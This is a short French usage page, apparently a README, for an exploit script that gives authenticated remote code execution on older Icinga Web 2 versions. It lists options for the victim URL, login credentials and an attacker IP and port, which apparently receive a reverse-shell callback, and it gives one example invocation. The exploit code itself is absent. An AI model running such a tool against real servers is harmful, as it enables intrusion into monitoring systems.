
Icinga Web 2 - Exécution de code à distance authentifiée <2.8.6, <2.9.6, <2.10
Icinga Web 2 - Exécution de code à distance authentifiée <2.8.6, <2.9.6, <2.10
usage: exploit.py [-h] -u URL -U USER -P PASSWORD -i IP -p PORT
Bienvenue.
options:
-h, --help show this help message and exit
-u URL, --url URL Insérer l'URL http://ip_victima
-U USER, --user USER Insérer utilisateur -U user
-P PASSWORD, --password PASSWORD
Insérer mot de passe -P password
-i IP, --ip IP Insérer IP_ATTAQUANT -i IP
-p PORT, --port PORT Insérer PORT_ATTAQUANT -p PORT
python3 exploit.py -u http://localhost -U admin -P admin123 -i 192.168.1.1 -p 443